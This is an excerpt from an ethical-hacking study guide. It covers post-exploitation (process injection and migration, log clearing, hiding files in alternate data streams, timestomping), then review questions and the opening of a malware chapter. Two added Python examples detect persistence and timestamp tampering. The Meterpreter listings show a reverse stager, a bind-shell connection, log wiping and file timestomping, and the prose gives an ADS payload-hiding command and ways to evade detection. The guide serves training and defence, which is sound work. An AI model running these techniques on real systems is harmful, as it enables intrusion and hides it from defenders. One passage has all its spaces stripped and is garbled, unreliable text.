This gives us many ways to retain access to the target systems past the initial entry point. You may have noted, however, that these persistence mechanisms introduce files and Registry entries to the target system. These actions and artifacts can be detected, assuming there are detection mechanisms on the endpoint or that anyone is paying attention to activities on the endpoint. This is a consideration. As you are investigating your endpoints, you may notice whether there is malware detection or other sorts of detection software on the target. Keep the cleanup RC file the module wrote: running it from a session at the end of the engagement removes the executable and the Run key, which is part of your obligation to leave the client's systems as you found them.

Covering Tracks

Any time you gain access to a system as part of a penetration test or security assessment, you will be leaving footprints. The act of logging in to a system leaves a log entry behind. Any files or other artifacts that may need to be left on the system have the potential of being located and flagged as malicious. This means the possibility of having your actions investigated and your foothold removed. You'd have to start all over against a target that is putting up additional hurdles for you to clear. This means you need to get good at covering up your existence as best you can.

There are a lot of aspects to hiding and covering tracks, however. For a start, once you have access to the system, you are more than likely creating logs. Logs may need to be adjusted. You may need to create files. For example, you want to place a payload on the target system. This will generally mean a file sitting on the filesystem. You need a good way of hiding any file you place on the system. Once you have an executable, you will want to run it. That means the process table will have evidence of the process executing. Anyone looking at the process table will see it, causing some investigation, even if it's just the user poking around a little.

Sometimes covering tracks amounts to a bit of obscurity. You make something a little harder to find or understand. It's a little like trying to hide in an open field. You do your best at covering yourself up, but someone doing some looking will find you.

Rootkits

The process table is, quite frankly, the hardest artifact to address. The reason is that the process table is stored in kernel space. To do anything with the process table, you need to have the ability to obscure something that's in kernel space. With most modern operating systems, there is a ring model when it comes to security and privileges. The highest level of permissions you can get is ring 0, which means you are in kernel space. The kernel needs complete control of the system because it interacts with hardware. No other element of the operating environment interacts with the hardware, or with the number of components, that the kernel does.

Interacting with the kernel goes through application programming interfaces (APIs). The request is made to the kernel through the API, which fulfills the request and returns the result to the process that issued the request. What all this means is that in order to manipulate anything in kernel space, like the process table, either you need to make a request to the kernel through an existing API function or you need to be in kernel space yourself. As the only way to manipulate the process table from outside the kernel is to create and kill processes, you can't actually hide the existence of a process from anywhere but the kernel.

Often, attackers will manipulate what users can see by use of a collection of software called a rootkit. A rootkit may contain a kernel-mode module or driver that filters process table results. This rootkit would need to know the names or properties of the processes that come with the rootkit so they can be filtered out. A rootkit may also contain replacement binaries (a user-mode rootkit) that similarly filter file listing results so anyone using the system binaries won't know that there are files in the filesystem related to the infection or compromise.

Rootkits are not something that come with Metasploit or other attack tools. Instead, Metasploit uses tactics like payload encoding to get past malware scanners, making it harder for these scanners to identify the software you are injecting. Beyond that, if you have control over the name of the executable you are running, changing it to something that won't be suspected can help keep the process from drawing attention. If you were, for example, to name it lsass.exe, a casual observer would see that and not think much of it because that's a common process on a Windows system. A casual observer is the limit of that trick, though: the real lsass.exe runs once, from C:\Windows\System32, as SYSTEM, with wininit.exe as its parent, and a second lsass.exe running from another path or under a different parent is one of the most common things EDR products are tuned to flag.

Process Injection

Since we don't want to leave any processes around that can be traced to us, we can think about making use of another process's address space. One way of doing that is to inject code into an existing process. The idea of process injection is to take code the attacker wants to run and inject it into an existing process. Once the code is injected into the process, the attacker needs to get it to run, which can be done by starting a new thread that executes the injected code. On a Windows system this is done by obtaining a handle to the process and then using the handle to allocate memory in the target process, write the code into it, and start a thread at that address (the classic API sequence is OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread). A handle, from a Windows API perspective, is an opaque reference to a kernel object, here the process, that API calls accept in place of a pointer. Once the attacker has the handle and gets code injected into the process space, that code can get executed. This means the code is running within the address space of the target process. The code is effectively hidden inside that process.

For example, in the following listing, you can see a Metasploit module that is told to inject code into a process specified as a parameter. The PID given is the postgres process, which would have put the shellcode in the address space of the database server. Read the output carefully, though: the module reports starting a fresh notepad.exe (PID 1296) to house the session and injecting into that, not into PID 3940, so the parameter did not have the intended effect in this run. The payload being executed binds to a TCP port whose value defaults to 4444, since no other value was specified as a parameter.
Process Injection Module

    meterpreter > run post/windows/manage/multi_meterpreter_inject PID=3940 PAYLOAD=windows/shell_bind_tcp
    [*] Running module against VAGRANT-2008R2
    [*] Creating a reverse meterpreter stager: LHOST=192.168.86.57 LPORT=4444
    [+] Starting Notepad.exe to house Meterpreter Session.
    [+] Process created with pid 1296
    [*] Injecting meterpreter into process ID 1296
    [*] Allocated memory at address 0x00170000, for 328 byte stager
    [*] Writing the stager into memory...
    [+] Successfully injected Meterpreter into process: 1296

    msf > connect 192.168.86.25 4444
    [*] Connected to 192.168.86.25:4444
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

    C:\ManageEngine\DesktopCentral_Server\bin>

After the process injection completes, you can see Metasploit being used, in a separate session, to connect to the remote system on the bound port, where we get a command prompt shell. Another, similar technique is to migrate our initial connection to another process. You can see this technique in the following listing. The migrate module starts up a new process and moves the Meterpreter payload we are connected to into it. You will see that we start in a JavaServer Pages (JSP) process; NepqI.jsp is the JSP payload uploaded by the initial ManageEngine exploit, which is exactly the kind of conspicuous artifact migration is meant to get away from. Once the migration is complete, we are running inside the context of a notepad.exe process. This is done by injecting code into the Notepad process.

Process Migration with Meterpreter

    meterpreter > run post/windows/manage/migrate
    [*] Running module against VAGRANT-2008R2
    [*] Current server process: NepqI.jsp (5624)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 6012
    [+] Successfully migrated to process 6012
    meterpreter >
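The persistence modules above left two things on the target that a defender, or you during cleanup, can look for: an executable in a Temp directory and a Run value with a random name pointing at it. The following is an added example written for this page, not Metasploit's or the book's code: it parses the text of a reg export of the Run keys and applies three simple heuristics to each entry. The .reg text is constructed; its second value mirrors the artifact persistence_exe reported above (value name qWQPRsRzw, path in a service account's Temp directory), and the first is a typical benign entry. Sysinternals Autoruns is the tool you would actually use on a live host; this shows the logic.

```python
import re
from dataclasses import dataclass, field

# Constructed `reg export` text. The second value mirrors the artifact the
# persistence_exe module left above (random value name, .exe in a Temp directory
# under a service account's profile); the first is a typical benign entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"qWQPRsRzw"="C:\\Windows\\SERVIC~2\\LOCALS~1\\AppData\\Local\\Temp\\default.exe"
'''

RUN_KEY_RE = re.compile(
    r"^HKEY_(CURRENT_USER|LOCAL_MACHINE|USERS\\[^\\]+)\\Software\\Microsoft\\Windows"
    r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


@dataclass
class Finding:
    key: str
    name: str
    command: str
    reasons: list = field(default_factory=list)


def _unescape(s):
    """A .reg file escapes backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Yield (key, value_name, string_data) for every REG_SZ value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:
                yield key, _unescape(m.group(1)), _unescape(m.group(2))


def executable_path(command):
    """First token of a Run command: the quoted program, or the text up to a space."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]


def looks_random(name):
    """Product Run entries are words; an 8+ letter name with almost no vowels is not."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8:
        return False
    return sum(c.lower() in "aeiou" for c in letters) / len(letters) < 0.2


def assess_run_entries(reg_text):
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if not RUN_KEY_RE.match(key):
            continue
        path = executable_path(data).lower()
        reasons = []
        if "\\temp\\" in path or "\\tmp\\" in path:
            reasons.append("runs from a temp directory")
        if "~" in path:
            reasons.append("8.3 short path, typical of tooling rather than an installer")
        if looks_random(name):
            reasons.append("random-looking value name")
        if reasons:
            findings.append(Finding(key, name, data, reasons))
    return findings


if __name__ == "__main__":
    for f in assess_run_entries(SAMPLE_REG):
        print(f"{f.key}\\{f.name} -> {f.command}\n   " + "; ".join(f.reasons))
```

Run against the constructed export, only the persistence_exe artifact is reported, on all three counts. None of these heuristics is proof on its own (plenty of legitimate software runs from AppData), but an entry that trips several of them is worth pulling the file for a hash and signature check. The same three signals are what you should expect a defender to notice about the artifacts the modules above created.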
What we achieve through the use of process migration is, ideally, to evade detection by endpoint protection solutions. Any action taking place will be done from the address space of an existing and unsuspicious process, even if the behaviors may be suspicious. As with other techniques discussed in this chapter, the important idea is to keep from getting detected. Running malicious code in a process that won't earn much in the way of notice is a good way of maintaining access without getting detected. Do keep in mind that a spawned notepad.exe with no window and an outbound network connection is itself a well-known indicator, precisely because so many tools default to it.

Windows is not the only operating system on which process injection can take place. On Linux and macOS systems, for example, you can use environment variables like LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS to have the dynamic loader load an attacker's shared library into a process before its normal libraries. Because the preloaded library is resolved first, any function it exports shadows the same-named function in the system libraries, so the attacker's code runs inside the target process. Both loaders ignore these variables for setuid programs, and on macOS the hardened runtime and System Integrity Protection restrict where library insertion is honored.

Log Manipulation

Logged information can be a very hit-or-miss proposition. In some cases, you will run across targets that log next to nothing. What they do log isn't maintained anywhere other than the system. This means if anyone thinks to look, the only place they will be able to find any information is on the local system. Some organizations will plan for incidents and make sure that they not only have solid logging policies in place but that they are also storing system logs in a central location, meaning that anything you do to the logs on the local system won't have an impact, because the place any investigator is going to go is the central log repository and, quite likely, a log search tool like Elastic Stack or Splunk.

One easy way of handling any logs on the target is to just clear them. This means that you will either wipe all the entries in the case of the event logs on a Windows system or just delete log files in the case of a Linux or Unix-like system. We can return to Meterpreter for some of this work. Once we have compromised a Windows system and have a Meterpreter shell, we can use the clearev command. You can see this in the following code. One of the challenges of this approach, though, is that you need to have the right set of permissions.

Clearing Event Viewer with Meterpreter

    meterpreter > clearev
    [*] Wiping 635 records from Application...
    [-] stdapi_sys_eventlog_clear: Operation failed: Access is denied.
    meterpreter > getuid
    Server username: NT AUTHORITY\LOCAL SERVICE

You can see from the output that the user we compromised didn't have adequate permissions to clear the event log. Based on the user ID, we have the LOCAL SERVICE user rather than the LOCAL SYSTEM user. LOCAL SYSTEM, or an administrator, would have had the permissions necessary to clear the logs; LOCAL SERVICE has limited permissions. Even with the right permissions, clearing a Windows event log is not silent: Windows records the clearing itself, with the account that did it, as event ID 1102 in the Security log and event ID 104 in the System log for the other logs, and an empty Application log on a busy server is an anomaly in its own right.

The process would be different on Unix-like systems. Logs there are commonly written to plaintext files. With the right permissions, these files could be altered by erasing them or by going in and removing any lines from the logs that may seem incriminating. Without auditing or central log forwarding, edits to a plaintext log are hard to detect after the fact. You could also just stop the syslog process when you get on the system. Anything that happens before that, including gaining access, will be logged, but you would be able to do anything else on the system without it being logged. Similarly, if auditing is enabled on the system, you could disable the audit daemon. Stopping either daemon is itself logged (auditd writes a shutdown record, and systemd journals the unit stopping), and on a host that forwards its logs the gap in the stream is visible centrally.

Hiding Data

Hiding data is a common activity. Some files can be hidden in plain sight. For example, on a Windows system, there are files that are stored in temporary directories. This is especially true for anything downloaded from the Internet. Figure 7.4 shows a directory listing for the temporary Internet files on a Windows system. This is not a directory most people visit, so it wouldn't be hard to place a file here and just have it never get noticed.

FIGURE 7.4 Temporary Internet files in Windows

The path to that directory is C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files, and the path has a lot of waypoints where you can similarly hide files where they won't be seen. This is in part because, by default, many of the directories shown here are hidden in Windows Explorer unless you change the setting to show them. Essentially, files anywhere in the AppData directory would be lost in the shuffle of a lot of temporary files and application-specific files.
On a Linux system, you can use dot files and dot directories to do the same sort of thing. A dot file has a filename that starts with a dot, such as .bashrc. Regular file listings won't show files that start with a dot (ls needs -a to show them). Similarly, you won't see directories that start with a dot. If you put files into one of those directories, they may get lost or overlooked.

Windows systems have a feature called alternate data streams (ADSs), which were implemented in the New Technology File System (NTFS) to support Macintosh clients: Macintosh files carry a separate resource fork, and a second data stream per file was how Windows NT's file server stored it. In the early '90s, Windows NT supported many more platforms and architectures than it does now, so while that Macintosh support no longer exists in Windows, ADS remains as a feature. You will most commonly see it used in downloaded files. They get flagged with the zone they came from, in a stream named Zone.Identifier. This is where the pop-up about files being downloaded from the Internet and asking if you want to open them comes from. The zone in the ADS is checked, and if it's the Internet zone, the user gets asked.

Figure 7.5 shows creating an alternate data stream and then creating a directory listing showing the existence of the alternate data stream (dir /r lists streams; a plain dir does not). Not all programs in Windows understand ADSs, which means you wouldn't normally use them to store files for regular use. They can be used to store properties of the file or they can be used for malicious purposes. For example, you may be able to store executables as an alternate data stream. You can use the type command to redirect an executable into an ADS (type payload.exe > host.txt:payload.exe). It becomes just another data stream attached to the file's entry in the Master File Table.

FIGURE 7.5 Using alternate data streams in Windows
313OneofthechallengeswithstoringexecutablesintoanADSisthattheyarenolongerdirectlyexecutablefromtheADS.Youwouldhavetoextracttheexecutableandthenrunthatratherthantryingtocallitfromtheseparatedatastream.Thishelpsprotectsystemsfromattackerswhowoulddojustthat,sinceregulardirectorylistings,includinginWindowsExplorer,wouldshownohintthattheADSisinplace.Thefilesizeonlyshowstheprimarydatastreamandnothingatallabouttheotherdatastreams.Thismakesiteffectiveathidingdata,justnotthemostefficientathidingdatathatyouwanttodirectlyexecute.OnefinalpossibilityonWindowssystemsisthevolumeshadowcopyservice.ThisisawayforWindowstostorebackupsofvolumesonarunningsystem.Windowscreatestheseshadowcopiestomaintainversionsoffiles,incasetheyneedtoberolledback.Itispossible,thoughdifficult,tomountoneofthevolumeshadowcopiesandthenmanipulatefilesinit.Thisisapossibilityforhidingdata,thoughit’snotreallythebestwaybecauseitcanbeverycumbersometodealwith.TimeManagementFilesinafilesystemallhavedatesandtimesassociatedwiththem.Youwillcommonlyhavemodified,accessed,andcreateddatesforeachfile.IfyouweretotrytoreplaceacommonfileinthefilesystemwithaTrojanthatcontainedapayloadyouhadcreated,itwouldhavethetimestampsassociatedwiththefileyouwereuploading.Thatmakesitmoredetectable.Instead,youcanmodifythetimesoffiles.Again,weturntoMeterpreter.Inthefollowingcode,youcanseetheuseoftimestomptomanipulatethetimesofafile.Usingtimestomp,wecansetthetimesonafileweuploaded,whichareidenticaltothetimestampsonthelegitimatefile.Whenwemoveourreplacementfileintoplace,itwillhavethecorrecttimes.TimestompingFilesmeterpreter>uploadregedit.exe[*]uploading:regedit.exe-­>regedit.exe[*]Uploaded72.07KiBof72.07KiB(100.0%):regedit.exe-­>regedit.exe[*]uploaded:regedit.exe-­>regedit.exemeterpreter>timestompregedit.exe-­f/windows/regedit.exe[*]PullingMACEattributesfrom/windows/regedit.exeAnytimeyoumanipulateafile,you’llbeadjustingthetimevaluesonthefilejustbytouchingit.You’llchangethemodifiedandaccessedtime,forinstance.Asawayofcoveringyourtracks,youcanmakesu
re to adjust the time values on files you touched back to what they were before you changed the file.

Chapter 7 System Hacking

Summary

Once you have all your information gathered about your target—networks, systems, email addresses, etc.—the next step is to work on exploiting the vulnerabilities. There are multiple reasons for exploiting the identified vulnerabilities that have nothing to do with simply proving you can. The ultimate goal is to improve the security posture and preparedness for the organization you are working with. This means the reason you are exploiting vulnerabilities is to demonstrate that they are there and not just false positives. Additionally, you are exploiting vulnerabilities in order to gather additional information to exploit more vulnerabilities to demonstrate that they are there. Ultimately, once you have finished your testing and identified vulnerabilities, you can report them back to your employer or client.

To exploit vulnerabilities, you need a way to search for exploits rather than being expected to write all the exploits yourself. There are online repositories of exploits, such as www.exploit-db.com. Some of these online repositories are safer than others. You could, for example, go to the Tor network and also look for exploits there. However, there are several potential problems with this. What you get there may not be safe, especially if you are grabbing binaries or source code you don't understand. If you prefer to keep exploit repositories local, such as if you aren't always sure if you will have Internet access, you can grab the Exploit-DB repository. There is also a search script, called searchsploit, that will help you identify exploits that match possible vulnerabilities.

Once you have exploited a system, there are several steps you would consider taking that would not only emulate what an attacker would do but also give you continued access to the compromised system and also to other systems in the network. For example, you can grab passwords from the system you have compromised. These passwords may be used on other systems once you have cracked the passwords using a tool like John the Ripper or rainbow tables. In a Windows domain, you will certainly find that usernames are probably usable across multiple systems, and often, local administrator passwords are used across systems as well.

You may find there are networks that you can't get to from the outside. You can pivot to those other networks once you have compromised a system. What you are doing is using the compromised system as a router. You will adjust your routing table to push traffic through the connection you have to the remote system. That system will then forward the packets out to other systems on the network.

To accomplish many tasks, you will need to have administrative privileges. This may require privilege escalation. This could be done by Meterpreter automatically, but more than likely you will need to make use of a local vulnerability that will give you administrative privileges once the vulnerability has been exploited. Metasploit can help with that, but you may also need to find other exploits that you run locally. One thing you may need elevated privileges for is to maintain persistence, meaning you can always get back into the system when you want to. There are ways to do it without elevated privileges, but getting administrative rights is always helpful.

You'll also want to cover your tracks to avoid detection. This may include wiping or manipulating logs. This is another place where elevated privileges are useful. There are a number of ways to hide files on the compromised system. This will help with casual observation, for sure. Really hiding files and processes may require a rootkit. You can also manipulate timestamps on files, which may be necessary if you are altering any system-provided files.
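The summary above mentions manipulating file timestamps as a way of covering tracks. Seen from the defender's side, the following added example (not code from the study guide) shows a heuristic a forensic reviewer can apply on a POSIX file system: utime() can rewrite a file's modified and accessed times but not its inode change time (ctime), so a file whose mtime has been pushed far into the past while its ctime is recent stands out, and a reset timestamp often has an exactly zero sub-second part. The file names and the one-year offset are constructed for the demonstration.

```python
"""Timestamp-manipulation ("timestomping") heuristic, added as a defender-side
example; it is not code from the study guide. On POSIX systems utime() can set
atime and mtime but never ctime, which the kernel updates on every metadata
change, so an mtime far older than ctime means the times were edited after
the last real write."""
import os
import tempfile
import time
from dataclasses import dataclass


@dataclass
class TimestampReport:
    path: str
    mtime: float
    ctime: float
    ctime_minus_mtime: float   # seconds; a large positive gap is the signal
    zero_subsecond: bool       # informational: mtime has no fractional part
    suspicious: bool           # decided on the ctime/mtime gap only


def check_timestamps(path: str, tolerance: float = 2.0) -> TimestampReport:
    """Flag a file whose ctime is more than `tolerance` seconds newer than its
    mtime. A normal write sets both together, so the gap stays near zero."""
    st = os.stat(path)
    gap = st.st_ctime - st.st_mtime
    return TimestampReport(
        path=path,
        mtime=st.st_mtime,
        ctime=st.st_ctime,
        ctime_minus_mtime=gap,
        zero_subsecond=(st.st_mtime_ns % 1_000_000_000 == 0),
        suspicious=gap > tolerance,
    )


def backdate_mtime(path: str, days: int = 365) -> None:
    """Push atime and mtime back by `days`, using whole seconds (what a
    timestamp-resetting tool typically does); ctime moves to 'now' instead."""
    past = int(time.time()) - days * 86400
    os.utime(path, (past, past))


def demo() -> dict:
    """Constructed sample: one untouched file and one backdated file."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean.txt")
        stomped = os.path.join(tmp, "stomped.txt")
        for p in (clean, stomped):
            with open(p, "w") as fh:
                fh.write("sample content\n")
        backdate_mtime(stomped)
        return {"clean": check_timestamps(clean),
                "stomped": check_timestamps(stomped)}


if __name__ == "__main__":
    for name, report in demo().items():
        print(f"{name}: gap={report.ctime_minus_mtime:.0f}s "
              f"zero_subsecond={report.zero_subsecond} suspicious={report.suspicious}")
```

The gap check is the robust one; the zero sub-second indicator is reported separately because file systems with one-second timestamp granularity produce it for every file.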
Review Questions

You can find the answers in the appendix.

1. What are the three times that are typically stored as part of file metadata?
A. Moves, adds, changes
B. Modified, accessed, deleted
C. Moved, accessed, changed
D. Modified, accessed, created

2. What is it called when you obtain administrative privileges from a normal user account?
A. Privilege escalation
B. Account migration
C. Privilege migration
D. Account escalation

3. What does John the Ripper's single crack mode, the default mode, do?
A. Checks every possible password
B. Uses known information and mangling rules
C. Uses a built-in wordlist
D. Uses wordlist and mangling rules

4. What is the trade-off for using rainbow tables?
A. Disk space prioritized over speed
B. Accuracy prioritized over disk space
C. Speed prioritized over accuracy
D. Speed prioritized over disk space

5. Which of these is a reason to use an exploit against a local vulnerability?
A. Pivoting
B. Log manipulation
C. Privilege escalation
D. Password collection

6. What is it called when you manipulate the timestamps on files?
A. Timestamping
B. Timestomping
C. Metastomping
D. Metamanipulation

7. What would an attacker use an alternate data stream on a Windows system for?
A. Hiding files
B. Running programs
C. Storing PowerShell scripts
D. Blocking files

8. Which of these techniques might be used to maintain access to a system?
A. Run key in the Windows Registry
B. Alternate data stream
C. .vimrc file on Linux
D. PowerShell

9. If you were looking for reliable exploits you could use against known vulnerabilities, what would you use?
A. Tor network
B. Meterpreter
C. msfvenom
D. Exploit-DB

10. What might an attacker be trying to do by using the clearev command in Meterpreter?
A. Run an exploit
B. Manipulate timestamps
C. Manipulate log files
D. Remote login

11. You find after you get access to a system that you are the user www-data. What might you try to do shortly after getting access to the system?
A. Pivot to another network
B. Elevate privileges
C. Wipe logs
D. Exploit the web browser

12. You've installed multiple files and processes on the compromised system. What should you also look at installing?
A. Registry keys
B. Alternate data streams
C. Rootkit
D. Root login

13. What does pivoting on a compromised system get you?
A. Database access
B. A route to extra networks
C. Higher level of privileges
D. Persistent access

14. What would you use the program rtgen for?
A. Generating wordlists
B. Generating rainbow tables
C. Generating firewall rules
D. Persistent access

15. Which of these would be a way to exploit a client-side vulnerability?
A. Sending malformed packets to a web server
B. Sending large ICMP packets
C. Sending a crafted URL
D. Brute-force password attack

16. What is one outcome from process injection?
A. Hidden process
B. Rootkit
C. Alternate data streams
D. Steganography

17. What tool would you use to compromise a system and then perform post-exploitation actions?
A. Nmap
B. John the Ripper
C. searchsploit
D. Metasploit

18. What application would be a common target for client-side exploits?
A. Web server
B. Web browser
C. Web application firewall
D. Web pages

19. What are two advantages of using a rootkit?
A. Installing alternate data streams and Registry keys
B. Creating Registry keys and hidden processes
C. Hiding processes and files
D. Hiding files and Registry keys

20. What could you use to obtain password hashes from a compromised system?
A. John the Ripper
B. Mimikatz
C. Rainbow tables
D. Process dumping

21. What technique would you use to prevent understanding of PowerShell scripts that had been logged?
A. Encoding
B. Obfuscation
C. Rainbow tables
D. Kerberoasting

22. What technique might you use to gather credentials from a remote system on a Windows network?
A. Kerberoasting
B. Fuzzing
C. Rootkits
D. PowerShell scripting

23. What language is commonly used by attackers who live off the land?
A. Ruby
B. Python
C. Cmdlets
D. PowerShell

24. If you wanted to identify vulnerabilities previously undiscovered in an application, including a network service, what tool might you use?
A. Rubeus
B. Ophcrack
C. John the Ripper
D. Peach

25. What operating system agnostic interface might you use if you had compromised a system?
A. Rubeus
B. Meterpreter
C. Empire
D. Ophcrack

Chapter 8 Malware

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Malware operations
✓ Antivirus systems and programs

Malware is big business. Not only are there hundreds of millions of malware families and variants in the world and an unknown number of programmers developing that malware, there are also at least dozens of companies developing anti-malware solutions. The developers who are working on writing malware are getting paid to write the software, anticipate selling off the malware, or expect to make money from the malware operations. Figure 8.1 shows the number of new malware samples that have been identified by the AV-Test Institute. This is by month over the last two years. You can see that in that time frame, there have often been more than 10 million new malware samples in a month.

FIGURE 8.1 AV-Test Institute malware statistics (new malware samples per month, February 2019 through January 2021; last update: January 17, 2021). Copyright © AV-TEST GmbH, www.av-test.org

While we use the umbrella term malware, which is a portmanteau of the words malicious and software, there are several different types of malware. Categorizing malware can be complicated. Some malware will fall into multiple categories because it's not always about how the malware spreads or infects; sometimes it's more useful to talk about what it does. To understand what the malware does, it's necessary for someone to do analysis of the malware. This can be done dynamically or statically. Of course, you can also generally rely on someone else's analysis.

Since malware these days is often part of something much larger—not strictly limited to existing in isolation on systems—it's helpful to understand the infrastructure that comes along with malware infections. This can also help to identify malware infestations, because of the network traffic that someone monitoring a network may see.

In terms of ethical hacking, you may want to create your own malware. This can be done without creating anything that is necessarily malicious, but if you want to be able to drop your own malware as part of your testing and also to provide yourself with persistent access, there are ways to do that.

Of course, malware comes with anti-malware solutions. It's not as simple as just saying antivirus anymore because there is more to anti-malware than a traditional antivirus solution. There are multiple solutions that can be used to protect against malware. Understanding how they work can also provide you with details about how to potentially avoid or evade the malware.

When you look at the MITRE ATT&CK Framework, malware isn't to be found, mostly because the different categories have specific techniques, tactics, and procedures that malware uses. Instead of finding malware in one category, you'll find malware in different categories.

Malware Types

This may get a little confusing, simply because a single malware sample can potentially be placed into multiple buckets. However, we're going to go through different ways of thinking about malware. Some of those will have to do with the way the malware spreads from system to system. Others will have to do with what behaviors the malware exhibits. You may also discover that you don't find one type of malware without also finding another. This may be especially true when it comes to the different behavioral types. Some types of behavioral malware just go naturally with others. Going through the different types of malware, you will start to understand the complexity of the landscape today. This includes the uses of malware as well as the users.

Virus

Since the software used to prevent or eradicate malicious software is often called antivirus, you can probably figure out that one of the most common words for malware is virus. Of course, not all malware is a virus, but all computer viruses are malware. A virus requires user
intervention to infect a system. The user has to do something to execute the virus. Once that happens, the virus will infect the system, possibly by injecting code into other programs, so when those programs run, the virus still retains control of the infected system. Every time the infected programs are run, the system will get reinfected, even if the original executable and process are removed. To remove a virus, all instances of it need to be removed.

Viruses have been around since at least the early '70s, though the theory of self-replicating computer programs has been around since 1949. An early example of a computer virus was the Creeper, which infected systems on the ARPAnet. This virus did nothing but replicate itself, without causing any damage other than the time it took to isolate and remove it. This is not inconsequential, since dealing with viruses can be very time-consuming. No files were deleted by Creeper, and no systems were rendered unusable. The first virus on the personal computer was the Elk Cloner. This also did nothing but copy itself. In the case of Elk Cloner, it copied itself to floppy disks inserted into the system. Those floppy disks would then be taken to other systems, infecting the operating system there so the program would infect any floppy disk inserted into that system.

Regardless of the virus and what it does, there are some elements that are common. Every virus will have the ability to identify a program to infect and also to copy itself into that program. This doesn't mean that the only way a virus works is to infect a single program and stop there. In some cases, it will place multiple copies of itself onto the filesystem. One example of that is the ILoveYou virus, which replaced media files, like photos and other images, with files named the same except for the addition of .vbs, meaning it was a Visual Basic Script (VBScript) file. Any time someone attempted to look at one of their photos, they actually executed a VBScript instead, ensuring that the system got reinfected.

A computer virus is said to have the same phases that a biological virus has. Viruses have dormant phases, where they are inactive, waiting for a trigger. The triggering phase is when the virus has been triggered by a user action or some other defined event. The trigger could be opening an email, launching a file, or perhaps even reaching a certain date and time. Viruses that wait for a specific time are sometimes called logic bombs. There is also a propagation phase, during which the virus will be trying to spread itself where it can by infecting other files or programs. It may also be working to send itself over email to other victims. Finally, there is the execution phase, when the virus does what it was written to do. This could be an action that is malicious, benign, or just a nuisance.

A virus may be memory resident. This means that when it infects a system, it remains in memory. This commonly means that it installs itself as part of the operating system, which means it loads into memory when the system boots and remains there until it shuts down. As they are always running, memory-resident viruses can scan, infect, and reinfect as needed. If it is nonresident, the virus has to be executed. The virus executes, scans, and infects as necessary, then executes. One nonresident type of virus is a macro virus. This is one that executes as a script as part of a document. Word documents, for example, can include macros, which are short scripts that launch and are executed when the document is opened. This virus could be spread by attaching to the macro and then just sending the document around. Many other document formats support script execution, including the Portable Document Format (PDF), and all can be prone to this sort of virus.

Worm

A virus propagates itself with some external assistance. By contrast, a worm gets launched initially, and all subsequent infections are a result of the worm moving from one system to another on its own. This is called self-propagation. The idea of computer worms has been around for decades. In fact, one of the earliest, and also one of the most devastating, happened in 1988. This was a program written by a graduate student named Robert T. Morris. It was designed to take advantage of several vulnerabilities in Unix programs as a way to move from one system to another. The payload of the program didn't do anything. Its only purpose was to demonstrate the ability to move from one system to another. In spite of that, the cost of downtime and cleanup was very large. On the low end of estimates, the cost was $218,775 in 2021 dollars. The cost ranges up to over $21 million.

Normally, worms are thought of as malicious in nature, but they don't have to be. There are certainly notorious worms like Code Red and Nimda, which caused a lot of damage around the world. However, there are also worms like Welchia/Nachi. The intent of that worm was to remove another worm, Blaster, and also patch systems so they wouldn't be vulnerable to Blaster any longer. Even getting rid of malware like Blaster isn't enough in the face of a worm. You can get rid of the malware, but if you don't remove the vulnerability the worm uses, the worm will just reinfect from another source. Regardless of the intent of the author, the problem with worms is the resource consumption and the amount of time and resources required to clean up after the malware.

Worms are typically indiscriminate. If they can find a system and the vulnerability they are programmed to use exists on that system, they are going to try to infect that system. This includes systems they have already infected—once they have exploited the vulnerability, they may check to see if there is already an instance of the worm. With multiple worm instances potentially attempting to attack a single host, network traffic increases. That's just the starting point for impact to an enterprise network. Exploiting vulnerabilities, especially multiple times at the same time, can consume processor and network resources. Maybe it's a minimal impact and no one really notices it, but really virulent worms can have a significant impact, as has been seen many times.

The important thing to keep in mind is that a worm propels itself. It doesn't require any assistance from the user. This means that it has a way of connecting to remote systems and executing itself on those systems. This is likely a result of a network-facing vulnerability. A significant challenge with worms is that once they have found their way into an environment, they can take advantage of trust relationships and lax restrictions on network communications. Systems are commonly allowed to communicate with other systems on the same network. When two systems inside the network communicate with one another, called east-west communications, it is generally considered to be trusted because both systems are owned and maintained by the organization. The expectation is they are under the control of the enterprise and not under the control of an attacker.

Worms do not necessarily have to be executables. There have been worms that make use of email programs and contact lists to propagate. You may have an HTML email that has script embedded in it. Once the email client renders the HTML, it runs the script, and the script makes use of a vulnerability or some other poorly configured mechanism in the email client. The worm accesses the contact list and sends a copy of itself to everyone in the contact list. This also leads to the potential for reinfection where the malware may have been identified and removed. If you are on my contact list, there is a good chance that either I am on yours or you know someone who has me on their contact list. At some point, a message is likely to come back to me. And this is another area where worms can be resource-consuming. With so many messages passing back and forth, message queues get clogged, making it harder for legitimate messages to get through, and it will require administrators to go in and manually clear the queues.

Trojan

A Trojan is really just another type of malware, commonly a virus. What sets it apart is the fact that it appears to be something it isn't. While it's probably well known, it is named after the so-called Trojan horse. The story goes that the Greeks, while at war with the people from Troy, built a horse as a "gift" for the Trojans. Inside the gift horse were Greeks. Rather than being a wooden horse statue, it was in fact a conveyance for the delivery of Greek soldiers who waited until nightfall, crept out of the wooden horse, and attacked the city of Troy from the inside.

